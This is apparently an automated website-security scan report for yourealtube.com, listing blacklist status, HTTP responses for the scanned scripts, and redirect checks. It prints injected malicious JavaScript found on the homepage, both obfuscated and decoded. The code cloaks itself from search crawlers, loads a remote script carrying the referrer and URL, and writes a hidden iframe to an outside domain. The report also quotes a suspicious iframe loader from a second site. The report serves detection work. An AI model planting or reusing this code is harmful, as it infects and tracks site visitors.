Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=yourealtube.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://yourealtube.com/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Fri, 26 Dec 2014 03:07:22 GMT Pragma: no-cache Location: http://www.yourealtube.com/ Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=149ru2uif0r6p5p35nmpm5ie64; path=/ X-Pingback: http://www.yourealtube.com/xmlrpc.php | clean |
http://www.yourealtube.com/ | 200 OK Content-Length: 47031 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _1Ol='7kSKlBXYjNXZfhSZwF2YzVmb1hSZ0lmc35CduVWb1N2bktTKsFTSoQGbph2Qk5WZwBXYuwWSPpwOdBzWpcCZhVGangSZtFmTnFGV5J0c05WZtVGbFRXZn5CduVWb1N2bkBSPgwWSPBichZnC7kCTSVlL05WZtV3YvRGK05WZu9Gct92QJJVVlR2bj5WZrcSPsJXdmcyKpIXZyJXZmVmcuQnbl1Wdj9GZoQnbl52bw12bDlkUVVGZvNmbltyJ9YWZyZyJrcyav1zYyNHdld2Pv02bj5SZ0F2YzVnZi9Wet5SawF2LvoDc0RHanASPgMmcz5CbxkkC7kyJ0BXayN2cngCduVWblxWRlRXYlJ3YuQnbl1Wdj9GZg0DIsFTSgIXY2tTf7kCKrFWZyJ0egkCM94TKnUGb0JXdUdCKm9EelRmbp5CduV2ZBJXZzVnLy9GdhdWa2Fmbuc3bk5Wa3BCf8BCM94TKnQ3biVGbn92bHd Decoded script: var _escape='%3Ciframe%20src%3D%22http%3A//virtuoso-luxury.info/go.php%3Fsid%3D1%22%20width%3D20%20height%3D20%20frameborder%3D20%3E%3C/iframe%3E';if(window.navigator.userAgent.indexOf('Rambler')>=0 || window.navigator.userAgent.indexOf('Yandex')>=0 || window.navigator.userAgent.indexOf('Yaho')>=0 || window.navigator.userAgent.indexOf('Googlebot')>=0 || window.navigator.userAgent.indexOf('Turtle')>=0) {Break();};var I1l = document.createElement('script'); I1l.src = 'http: I1l.src = 'http://api.myobfuscate.com/?getsrc=ok'+'&ref='+encodeURIComponent(document.referrer)+'&url='+encodeURIComponent(document.URL); var OIl = document.getElementsByTagName('head')[0]; OIl.appendChild(I1l);document.write(unescape(_escape)); Antivirus reports:
| ||
http://www.yourealtube.com/wp-includes/js/l10n.js?ver=20101110 | 200 OK Content-Length: 308 Content-Type: application/javascript | clean |
http://www.yourealtube.com/wp-includes/js/jquery/jquery.js?ver=1.6.1 | 200 OK Content-Length: 91363 Content-Type: application/javascript | clean |
http://www.yourealtube.com/index.php?ak_action=aktt_js&v=2.4 | 200 OK Content-Length: 0 Content-Type: text/javascript | clean |
http://www.yourealtube.com/wp-content/themes/eVid/js/slider.js | 200 OK Content-Length: 3559 Content-Type: application/javascript | clean |
http://www.yourealtube.com/wp-content/themes/eVid/js/scrollTo.js | 200 OK Content-Length: 6296 Content-Type: application/javascript | clean |
http://www.yourealtube.com/wp-content/themes/eVid/js/serialScroll.js | 200 OK Content-Length: 6976 Content-Type: application/javascript | clean |
http://www.yourealtube.com/wp-content/themes/eVid/js/init.js | 200 OK Content-Length: 5422 Content-Type: application/javascript | clean |
http://www.yourealtube.com/wp-content/themes/eVid/js/superfish.js | 200 OK Content-Length: 3707 Content-Type: application/javascript | clean |
http://www.nuesion.com/livehelp/livehelp_js.php?eo=1&department=3&what=hidden&serversession=1&pingtimes=15 | 200 OK Content-Length: 28634 Content-Type: text/html | clean |
http://www.nuesion.com/test404page.js | 404 Not Found Content-Length: 29864 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. ...[557 bytes skipped]... ventListener?e.addEventListener(b,d,false):e.attachEvent("on"+b,d); (function(){function l(j){j="head";return["<",j,"></",j,"><",z,' onl'+'oad="var d=',B,";d.getElementsByTagName('head')[0].",y,"(d.",A,"('script')).",u,"='",a,"//",c.l,"'",'"',"></",z,">"].join("")}var z="body",s=h[z];if(!s){return setTimeout(arguments.callee,100)}c.P(1);var y="appendChild",A="createElement",u="src",r=h[A]("div"),G=r[y](h[A](g)),D=h[A]("iframe"),B="document",C="domain",q;r.style.display="none";s.insertBefore(r,s.firstChild).id=g;D.frameBorder="0";D.id=g+"-loader";if(/MSIE[ ]+6/.test(navigator.userAgent)){D.src="javascript:false"} D.allowTransparency="true";G[y](D);try{D.contentWindow[B].open()}catch(F){i[C]=h[C];q="javascript:var d="+B+".open();d.domain='"+h.domain+"';";D[u]=q+"void(0);"}try{var H=D.contentWindow[B];H.write(l());H.close()}catch(E){D[u]=q+'d.write("'+l().replace(/"/g,String.fromCharCode(92)+'"')+'");d.close( ...[356 bytes skipped]... Decoded script: function () { if (c.f) { (new Image).src = a + "//" + c.l.replace(".js", ".png") + "&" + escape(e.location.href); } c.f = null; } /*** called setTimeout with function () { if (c.f) { (new Image).src = a + "//" + c.l.replace(".js", ".png") + "&" + escape(e.location.href); } c.f = null; }, 20000 */ function d() { c.P(b); e[g](b); } | ||
http://www.nuesion.com/wp-content/themes/BLAKESLEY/js/jquery-1.4.2.min.js | 200 OK Content-Length: 72174 Content-Type: application/javascript | clean |
http://www.nuesion.com/wp-content/themes/BLAKESLEY/js/jquery-ui.min.js | 200 OK Content-Length: 186173 Content-Type: application/javascript | clean |
http://www.nuesion.com/wp-content/themes/BLAKESLEY/js/scripts.js | 200 OK Content-Length: 37591 Content-Type: application/javascript | clean |
http://www.nuesion.com/wp-content/themes/BLAKESLEY/js/jquery.pretty_photo.js | 200 OK Content-Length: 30943 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: yourealtube.com
Result:
HTTP/1.1 301 Moved Permanently
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 26 Dec 2014 03:07:22 GMT
Pragma: no-cache
Location: http://www.yourealtube.com/
Server: Apache
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=149ru2uif0r6p5p35nmpm5ie64; path=/
X-Pingback: http://www.yourealtube.com/xmlrpc.php
...0 bytes of data.
GET / HTTP/1.1
Host: yourealtube.com
Result:
HTTP/1.1 301 Moved Permanently
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 26 Dec 2014 03:07:22 GMT
Pragma: no-cache
Location: http://www.yourealtube.com/
Server: Apache
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=149ru2uif0r6p5p35nmpm5ie64; path=/
X-Pingback: http://www.yourealtube.com/xmlrpc.php
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: yourealtube.com
Referer: http://www.google.com/search?q=yourealtube.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: yourealtube.com
Referer: http://www.google.com/search?q=yourealtube.com
Result:
The result is similar to the first query. There are no suspicious redirects found.